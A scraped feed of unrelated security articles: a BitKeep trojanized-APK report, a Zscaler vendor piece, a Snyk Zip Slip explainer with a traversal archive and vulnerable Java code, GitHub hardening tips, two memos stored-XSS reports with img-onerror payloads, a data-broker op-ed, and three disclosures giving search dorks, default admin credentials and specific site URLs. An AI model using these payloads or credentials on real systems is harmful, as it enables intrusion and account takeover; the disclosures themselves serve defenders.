Decentralized multi-chain crypto wallet BitKeep on Wednesday confirmed a cyberattack that allowed threat actors to distribute fraudulent versions of its Android app with the goal of stealing users' digital currencies.
"With maliciously implanted code, the altered APK led to the leak of user's private keys and enabled the hacker to move funds," BitKeep CEO Kevin Como said, describing it as a "

Blockchain / Android Malware

Decentralized multi-chain crypto wallet BitKeep on Wednesday confirmed a cyberattack that allowed threat actors to distribute fraudulent versions of its Android app with the goal of stealing users' digital currencies.

"With maliciously implanted code, the altered APK led to the leak of user's private keys and enabled the hacker to move funds," BitKeep CEO Kevin Como said, describing it as a "large-scale hacking incident."

According to blockchain security company PeckShield and multi-chain blockchain explorer OKLink, an estimated $9.9 million worth of assets have been plundered so far.

"Funds stolen are on BNB Chain, Ethereum, TRON and Polygon," BitKeep further noted in a series of tweets. "More than 200 addresses on the other three chains were used in the heist, and all funds were transferred to 2 main addresses in the end."

The incident is said to have taken place on December 26, 2022, with the threat actor exploiting and hijacking version 7.2.9 of the Android app package (.APK) file hosted on its website to distribute the trojanized variant.

That said, the digital break-in doesn't impact BitKeep apps downloaded via Google Play, Apple App Store, or the Google Chrome Web Store.

As many as five different counterfeit versions of the Android app with the following package names have been identified, suggesting that the apps were potentially distributed through phishing websites. The legitimate package name is "com.bitkeep.wallet."

*   com.bitkeep.app
*   com.bitkeep.w4
*   com.bitkeep.w5
*   com.bitkeep.wallet5
*   io.bitkeep.wallet

The Singapore-headquartered company, which was founded in 2018, said it has traced the wallet address used to carry out the theft and that some of the siphoned digital assets have been frozen.

Users who have downloaded the APK file for version 7.2.9 are advised to install the latest version (7.3.0) released today and transfer the funds to a newly generated wallet address.

This is not the first time BitKeep has been breached. On October 18, 2022, it disclosed another security incident targeting its BitKeep Swap service that led to losses of about $1 million.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

BitKeep Confirms Cyber Attack, Loses Over $9 Million in Digital Currencies

Digital transformation initiatives are challenging because IT still has to make sure performance doesn't suffer by making applications available from anywhere.

Over the past two years, many businesses have adopted hybrid work environments and begun migrating mission-critical applications to the cloud to allow their hybrid workforce to work from anywhere. However, combining working from anywhere with migrating applications such as Salesforce, SAP, Microsoft 365, and ServiceNow was an IT challenge because the networks needed to be improved.

The challenge was to reduce downtime and increase end user productivity. Even minor outages can impact operations, productivity, and profits, with Gartner suggesting that unplanned downtime costs US$5,600 per minute. To reduce such costs, businesses must quickly identify the root cause of outages and turn to intelligent digital experience monitoring solutions.

    

45 minutes of downtime costs more than a quarter million dollars. (Source: Gartner)

Businesses spent time rethinking the digital transformation journey to ensure they were delivering excellent performance while still securing users, workloads, and device communications over any network. As businesses look forward to 2023, three top digital experience monitoring trends emerge:

**Increase Hybrid Workforce Productivity**

Many businesses have accelerated digital business initiatives over the past couple of years to retain talent and optimize productivity. Companies like Zoom, Facebook, Google, and Apple adjusted their work-from-home policies to allow 100% remote and hybrid formats. Even healthcare businesses have enabled staff to work remotely, offering more telemedicine options and limiting in-person appointments.

Remote work is here to stay for the foreseeable future, as employees have proven that this hybrid model is possible. However, IT teams need to focus on keeping the business operational while ensuring excellent end user productivity. Supporting hybrid workers means having fast and reliable insights as issues arise from various devices, applications, and networks being used. For example, help desk and network operations teams need to know whether the user is having an issue with the local Wi-Fi connection or if there are problems with any of the network hops between the user's machine and where the application is hosted.

As hybrid workers become more adept at working from home, they learn basic connectivity troubleshooting steps, such as rebooting the home Wi-Fi router. In 2023, businesses need to be able to quickly recommend ways to solve end user problems without requiring users to open support tickets. IT teams need a global view of their environment to pinpoint areas of focus, and then to actively look at specific users to understand their challenges. This will reduce IT troubleshooting time while increasing end user productivity.

**Faster Mean Time to Resolution (MTTR) With Smart Technologies**

Service desk and network operations teams must look past traditional castle-and-moat architecture, change their work-from-home policies, and provide users with fast and reliable access from anywhere. To increase productivity, IT teams must diagnose an end user's situation quickly and confidently. They must analyze each device, dedicated network path, and application response times. That's the only way to grasp the end user's dilemma fully. To effectively analyze data from these segments and provide a meaningful response, IT teams will benefit from the help of AI and machine learning (ML).

In 2023, we’ll see continued growth in AI/ML-based technologies as they ingest more data and learn to apply insights across the board. The key will be the amount of data being ingested and analyzed. The intelligence will come from solutions that combine multiple facets of end user experience. For example, providing secure, fast, and reliable connections with the ability to triage issues based on collected data will separate solutions that offer combined capabilities from ordinary point products.

The FIFA World Cup used AI to produce some compelling projections . Imagine if the players knew exactly where to position the ball for a goal—it would be game-changing! Similarly, if service desk and network operations teams could similarly leverage AI, they would be able to quickly triage end user issues In 2023, let's spend less time with traditional operations troubleshooting guides and more with AI-based solutions.

As IT teams look to better understand their environments, they’ll need intelligent systems to provide trends and patterns holistically. In 2023, AI-based solutions should evolve to find trends and systematic issues. For example, imagine a view into your network that classified which ISPs were the most troublesome globally. You could create a plan to move off those ISPs or position them as backups, for instance. You could also use this knowledge to negotiate better terms with the ISP. Armed with AI-based insights, IT teams would have opportunities to optimize their environments and reduce potential outage scenarios.

**Reduce IT Costs With Monitoring Plus Security Solutions**

Macroeconomics will focus on reducing overall costs and increasing flexibility (consolidation). In 2023, businesses will not only look to remove siloed monitoring solutions around devices, networks, and applications; they will also look for solutions that combine monitoring and security. These two services fit together nicely.

With security issues on the rise, IT teams will continue to face pressure from executives on what happened, end user impact, and prevention techniques. The challenge will be trying to reduce costs while gaining this intelligence. Cloud-based solutions make it easier for IT teams to get started small, get comfortable with the solution, and then scale.

For example, when the economy shifts, more businesses look to consolidate through mergers and acquisitions. However, these business initiatives aren’t always predictable, and IT must ensure solutions are in place that can easily handle these shifts. With secure cloud-based solutions, IT teams can quickly focus on security and monitoring, and then scale while controlling costs .

One more way to reduce costs in 2023 will be to focus on using existing IT service management tools. For example, many businesses use ServiceNow—wouldn't it be great if digital experience monitoring could easily integrate into these solutions? IT teams could more easily adopt new digital experience monitoring solutions without changing their entire workflow. Continuing to reduce costs is all about intelligently gaining insights with smarter integrations.

Read more _Partner Perspectives_ from Zscaler.

Securing and Improving User Experience for the Future of Hybrid Work

Due to improper path santization, archives containing relative file paths can cause files to be written (or overwritten) outside of the target directory.

The vulnerability has been found in multiple ecosystems, including JavaScript, Ruby, .NET and Go, but is especially prevalent in Java, where there is no central library offering high level processing of archive (e.g. zip) files. The lack of such a library led to vulnerable code snippets being hand crafted and shared among developer communities such as StackOverflow.

The vulnerability is exploited using a specially crafted archive that holds directory traversal filenames (e.g. ../../evil.sh). The Zip Slip vulnerability can affect numerous archive formats, including tar, jar, war, cpio, apk, rar and 7z. If you’d like the information on this page in a downloadable technical white paper, click the button below.

Download Technical White Paper

Zip Slip is a form of directory traversal that can be exploited by extracting files from an archive. The premise of the directory traversal vulnerability is that an attacker can gain access to parts of the file system outside of the target folder in which they should reside. The attacker can then overwrite executable files and either invoke them remotely or wait for the system or user to call them, thus achieving remote command execution on the victim’s machine. The vulnerability can also cause damage by overwriting configuration files or other sensitive resources, and can be exploited on both client (user) machines and servers.

**Exploitable Application Flow**

The two parts required to exploit this vulnerability is a malicious archive and extraction code that does not perform validation checking. Let’s look through each of these in turn. First of all, the contents of the zip file needs to have one or more files that break out of the target directory when extracted. In the example below, we can see the contents of a zip file. It has two files, a good.sh file which would be extracted into the target directory and an evil.sh file which is trying to traverse up the directory tree to hit the root and then add a file into the tmp directory. When you attempt to cd .. in the root directory, you still find yourself in the root directory, so a malicious path could contain many levels of ../ to stand a better chance of reaching the root directory, before trying to traverse to sensitive files.

           
  5 Tue Jun 5 11:04:29 BST 2018 good.sh 20 Tue Jun 5 11:04:42 BST 2018 ../../../../../../../../tmp/evil.sh
          
  

The contents of this zip file have to be hand crafted. Archive creation tools don’t typically allow users to add files with these paths, despite the zip specification allowing it. However, with the right tools, it’s easy to create files with these paths.

The second thing you’ll need to exploit this vulnerability is to extract the archive, either using your own code or a library. The vulnerability exists when the extraction code omits validation on the file paths in the archive. An example of a vulnerable code snippet (example shown in Java) can be seen below.

     
  1   Enumeration<ZipEntry>entries = zip.getEntries(); 
  2   while (entries.hasMoreElements()) { 
  3       ZipEntry e = entries.nextElement(); 
  4       File f = new File(destinationDir, e.getName()); 
  5       InputStream input = zip.getInputStream(e); 
  6       IOUtils.copy(input, write(f)); 
  7   }
          
  

You can see on line 4, e.getName() is concatenated with the target directory, dir, without being validated. At this point, when our zip archive gets to our evil.sh, it will append the full path (including every ../) of the zip entry to the target directory resulting in evil.sh being written outside of the target directory.

To see Zip Slip in action,

watch us exploit the vulnerable java-goof application

, a sample application used to show many known vulnerabilities.

**Are you Vulnerable?**

You are vulnerable if you are either using a library which contains the Zip Slip vulnerability or your project directly contains vulnerable code, which extracts files from an archive without the necessary directory traversal validation. Snyk is maintaining a GitHub repository listing all projects that have been found vulnerable to Zip Slip and have been responsibly disclosed to, including fix dates and versions. The repository is open to contributions from the wider community to ensure it holds the most up to date status.s.

**What action should you take?**

Here are some steps you can take to check if your project’s dependencies of code contain the Zip Slip vulnerability:

**1\. Search through your projects for vulnerable code.**  

Expand this section

Groovy

Expand this section

JavaScript

Expand this section

Ruby & Python

**2\. Add Zip Slip Security Testing to your application build pipeline**

If you’d prefer not to search through your direct and transitive dependencies (of which you likely have hundreds) to determine if you’re using a vulnerable library, you can choose a dependency vulnerability scanning tool, like Snyk. It’s a good practice to add security testing into your development lifecycle stages, such as during development, CI, deployment and production. You can test your own projects (all the ecosystems mentioned above are supported) to determine if they are vulnerable to Zip Slip.

**Other vulnerable projects**

Vulnerable projects include projects in various ecosystems that either use the libraries mentioned above or directly include vulnerable code. Of the many thousands of projects that have contained similar vulnerable code samples or accessed vulnerable libraries, the most significant include: Oracle, Amazon, Spring/Pivotal, Linkedin, Twitter, Alibaba, Jenkinsci, Eclipse, OWASP, SonarQube, OpenTable, Arduino, ElasticSearch, Selenium, JetBrains and Google.

**Thank you!**

The Snyk security team would like for thank all the vendors, project owners and the community members that helped raise awareness, find and fix vulnerabilities in projects across many ecosystems.

CVE-2020-36566: Snyk Vulnerability Database | Snyk

The unfettered collaboration of the GitHub model creates a security headache. Follow these seven principles to help relieve the pain.

Last week Okta announced a security breach that involved an attacker gaining access to its source code hosted in GitHub. That's just the latest example in a long string of attacks gaining access to company source code in GitHub. Dropbox, Gentoo Linux, and Microsoft have all had their GitHub accounts targeted before.

With 90 million active users, GitHub is the most popular source code management tool for both open source and private enterprise code repositories. It's a major piece of fundamental infrastructure and the keeper of some of the most sensitive assets and data in the world.

It's no wonder that attackers are increasingly going after source code. In some cases, such as Okta, they might be trying to gain access to the source code. More often, the attackers are looking for sensitive information to use in a subsequent attack.

An attacker who can gain access to private source code can examine it for vulnerabilities and then exploit those vulnerabilities in subsequent attacks. Attackers can also harvest hardcoded keys, passwords, and other credentials that might be stored in GitHub to gain access to cloud services and databases hosted in AWS, Azure, or GCP. A single stolen repository can yield intellectual property, valid credentials, and a nice list of vulnerabilities in production software that are ready to be exploited.

Shiny Hunters, an attack group known to specifically target private GitHub repositories, has breached tens of companies using this technique, and sold their data across various Dark Web marketplaces.

**Securing the Organization's GitHub Environment**

There is no question that GitHub is a critical part of the organization's infrastructure, but locking it down is a complex and challenging identity security problem. The beauty of the GitHub model is that it allows for unfettered collaboration, but that also creates one of the biggest headaches in modern IT security.

Just think about it: Anyone remotely technical in 2022 has a GitHub account. And you can use your GitHub account for everything. We can use these accounts for personal side projects, open source contributions, and our work in public and private code repositories that are ultimately owned by our employers. That is a lot of heavy lifting for a single identity!

You can also use the "Sign in with GitHub" feature to use your GitHub identity in other websites and services outside of just GitHub itself. And there's more: GitHub is unique in that you don't just sign in to their website, you also pull, push, and clone code from GitHub's servers down to your local machine via git operations over HTTPS and SSH, which themselves require your GitHub identity.

Clearly GitHub picked up on these security implications when it announced the deprecation of usernames and passwords for git operations last year — a step in the right direction.

**7 Tips for Securing Your GitHub**

While GitHub provides tools to lock down the environment, organizations need to know how to use them. Unfortunately, some of the most important security capabilities require GitHub Enterprise. Nonetheless, here are seven principles for better GitHub security.

1.  **Don't allow personal accounts for work.** We get it, your company has a few public repositories and you can build your credibility by showing off some public contributions in your next job interview. Your personal GitHub account is part of your brand. Unfortunately, this is also one of the biggest holes in organizations using GitHub today: They do not strictly govern the use of personal accounts for work purposes. As tempting as it might be, personal accounts should not be used for work. There's just no way to control who has access to that personal Gmail address that you used to create your personal GitHub account.
2.  **Require authentication via company SSO.** Unfortunately, GitHub shows up prominently on the SSO Wall of Shame. That's right — you need to pay extra for SSO integration. Once you have GitHub Enterprise, you can connect GitHub to your company SSO, such as Okta or Azure AD or Google Workspace, and you can lock down your organization to only allow authentication via SSO.
3.  **Require 2FA on all accounts.** Even if you enforce two-factor authentication (2FA, aka MFA) via your SSO and also require SSO authentication, the safest option is to still enforce 2FA for all GitHub users in your organization. Exemption groups and policy exceptions in your SSO provider can make SSO MFA easy to bypass.
4.  **Use SSH Keys for git operations.** While GitHub has introduced fine-grained permissions control with personal access tokens (PATs), they remain susceptible to phishing as these tokens are often copied around in plaintext. By using SSH keys for authentication for git operations, your organization can use thoughtful PKI to govern how SSH keys are provisioned, and can also tie this to your company's device management and your own certificate authority (CA).
5.  **Restrict repository member privileges using roles.** GitHub offers several different repository roles that can be assigned based on the principle of least privilege. Base permissions can be controlled at the organization level. Always take care to assign the least privileged role that a member needs to be productive. Don't make everyone an admin.
6.  **Don't allow outside collaborators.** Working with contractors is a normal part of managing large software projects. However, the governance surrounding outside collaborators in GitHub is insufficient to keep your organization secure. Instead, force outside collaborators to authenticate via your company SSO, and do not allow repository admins to invite them directly to your organization's repositories.
7.  **Audit, analyze, and audit again.** No organization is perfect; even with the best policies in place, accounts fall through the cracks and mistakes are made. Even before locking down your GitHub organization, take the time to implement a regular audit process to look for dormant accounts that are not using their access and to limit the number of privileged roles in your repositories. Once your environment is locked down, keep an eye out for policy violations, such as a user who is somehow still authenticating outside of your SSO or not using 2FA.

The breach of Okta's GitHub repository is a powerful example of just how hard it is to protect identities within enterprises, but it isn't a unique one. Every day we see what happens when employees and contractors experience account takeover. We see the effects of weak authentication, lax policies for personal email accounts, and the ever-expanding size of the identity attack surface.

Unfortunately, this latest incident is just one part of a growing trend of identity-related breaches to watch for in 2023.

Why Attackers Target GitHub, and How You Can Secure It

Cross-site Scripting (XSS) - Stored in GitHub repository usememos/memos prior to 0.9.0.

**Description**

Stored XSS is a type of XSS that stores malicious code on the application. The demo website is affected of it.

**Proof of Concept**

#1. Access to the demo website https://demo.usememos.com/

#2. At "Any thoughts....", write XSS Payload and save it. In this scenario, I used payload: "><img src=x onerror=alert("XSS")>

#3. Now, at Search bar, just type "> (or any character in the payload) and the payload will be triggered.

**Link: https://drive.google.com/file/d/1OfyG91RtpV-\_rUanDrWiTbStjf0X7QJN/view?usp=sharing****Impact**

Be able to steal user's cookies.

CVE-2022-4694: Stored XSS in Search in memos

Valid

Reported on

Dec 19th 2022

**Description**

After login create a new post and type the following text with XSS payload

    XSS in create post [<img src=x onerror=alert(1)>](http://test.cc)
    

then click post that will be executed.

**Proof of Concept**

    XSS in create post [te<img src=x onerror=alert(1)>te](http://google.com)
    
    

**Impact**

Users account takeover + admin

CVE-2022-4695: Stored XSS while creating a new post in memos

Inaccurate information from data brokers can damage careers and reputations. It's time for US privacy laws to change how law enforcement and legal agencies obtain and act on data.

"Predictive policing" sounds like something from the plot of the movie _Minority Report_. However, it's a very real practice that relies heavily on data collected and disseminated by two of the largest data brokers in the United States — RELX and Thomson Reuters.

When we talk about big data, we tend to focus on companies such asAmazon, Equifax, Experian, Google, and Meta (formerly known as Facebook). These are mostly companies that commercialize data for marketing efforts, business decisions, product insights, and financial reasons. RELX and Thomson Reuters operate a little differently. These data giants broker data access, analytics tools, news, and research to libraries, scientists, large corporations, law enforcement, and other government agencies.

They are sometimes referred to as "law enforcement data brokers" due to the breadth of information they make available to legal and law enforcement agencies. Unfortunately, this is also a major point of contention with the public.

**What Do Law Enforcement Data Brokers Do?**

Law enforcement data brokers have used technology to expand the scope of public surveillance far beyond traditional surveillance means. While RELX and Thomson Reuters are secretive about their data-collection resources, there are many obvious information veins, including court records, news collections, research studies, and any information you make public that they feel is valuable.

It's not just the massive amount of data they have on every one of us that's a problem, it's also how they analyze this data to make human risk predictions. The information they combine uses past activities, legal records, personal associations, and even ZIP codes to determine the risk that a person will break the law or conduct illegal activity. It's effectively high-tech profiling, and often perpetuates systemic racism.

These data brokers also provide vast amounts of information to the US Immigration and Customs Enforcement (ICE) Agency, which it then uses to target immigrants. This has led to a collective public outrage that has produced petitions, lawsuits, and increased interest in how law enforcement and the government obtain and use data.

**Law Enforcement Has Found a Workaround to Data Privacy Laws**

Many of us are aware that we, as Americans, have a right to privacy. And there are laws that prohibit law enforcement and government agencies from gathering and using our data under most circumstances. However, these laws say nothing about them buying this data access from third parties.

Since the government isn't collecting and processing this data itself, these agencies can skirt federal privacy laws, operating in a legal gray area.

While we all deserve to live in a safe environment, we also deserve to not have our privacy violated and data used to inform legal opinions about our potential for certain actions.

**The Data They're Using Isn't Always Accurate**

It's unsettling to imagine that information being used to assess the risk you pose isn't necessarily accurate. It's not just related to law enforcement targeting; it's also related to any legal decisions. Custody decisions, civil suit outcomes, insurance decisions, and even hiring decisions can all be influenced by the RELX-owned LexisNexis system, which gathers and aggregates data.

Unfortunately, there's little recourse for someone who was unfairly treated due to a data-based risk assessment because people are rarely privy to the way these decisions are made. So, a corporate HR manager or Family Court judge could be operating off bad or incomplete data when making decisions that could effectively change lives.

RELX and Thomson Reuters have disclaimers freeing them from liability for inaccurate data, which means your information could be mixed in with someone else's, causing serious repercussions in the wrong circumstances.

In 2016, a man named David Alan Smith successfully sued LexisNexis Screening Solutions when the company provided his prospective employer with an inaccurate background check. LexisNexis failed to make sure that Smith's middle name was the same across all the data, resulting in the reporting of a criminal history that was not his. Smith's potential employer withdrew its job offer based on this report, showing just how significantly bad data can impact someone's life.

Fortunately, the courts held LexisNexis accountable for this gross negligence, but this is not always the case.

**How Can We Stop This Misuse of Data?**

Because privacy laws are still young and poorly structured in the US, the best recourse is to be knowledgeable and vocal. There are online petitions and organizations that are working to change how law enforcement and legal agencies obtain and act on data.

Hopefully, with enough public support, we can push legislators to act. Every person has a right to be in control of their own data. Any entity that threatens that right should be held accountable, and protections need to be put in place to prevent it from continuing to happen.

The Threat of Predictive Policing to Data Privacy and Personal Liberty

Courier Deprixa version 2.5 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : COURIER DEPRIXA V2.5 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://www.themeslide.com/courier-deprixa-logistics-worldwide-v2-5/                                               |  | # Dork      :                                                                                                                    |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=09731 [+] https://deprixalogistics.online/dashboard/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Courier Deprixa 2.5 Backdoor Account

Consultine Consulting Business and Finance Website CMS version 1.8 has been reported as having a default backdoor account.

    =======================================================================================================================================================================================| # Title     : consultine consulting business and finance website cms v1.8 Backdoor Account Vulnerability                                                                            || # Author    : indoushka                                                                                                                                                             || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                                                                               | | # Vendor    : https://codecanyon.net/item/consultine-consulting-business-and-finance-website-cms/22236735                                                                           |  | # Dork      : About Us  Lorem ipsum dolor sit amet, omnis signiferumque in mei, mei ex enim concludaturque. Senserit salutandi euripidis no per, modus maiestatis scribentur est an.|=======================================================================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin@gmail.com & pass=1234 [+] https://www.seusite.top/jornal/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Consultine Consulting Business And Finance Website CMS 1.8 Backdoor Account

Car Dealer Pro version 2.01 has been reported as having a default backdoor account.

    ====================================================================================================================================| # Title     : Car Dealer Pro v2.01 Backdoor Account Vulnerability                                                                || # Author    : indoushka                                                                                                          || # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 102.0.1(64-bit)                                            | | # Vendor    : https://codecanyon.net/item/car-dealer-pro/7265588                                                                 |  | # Dork      : "Powered by: Car Dealer Pro"                                                                                       |====================================================================================================================================poc :[+] Dorking İn Google Or Other Search Enggine.[+] Use Payload : user=admin & pass=pass1234 [+] http://car.wenclub.vip/admin/Greetings to :=========================================================================================================================                                                                                                                                      |jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * shadow_00715 * LiquidWorm* moncet                                     |                                                                                                                                              |=======================================================================================================================================

Tag

#google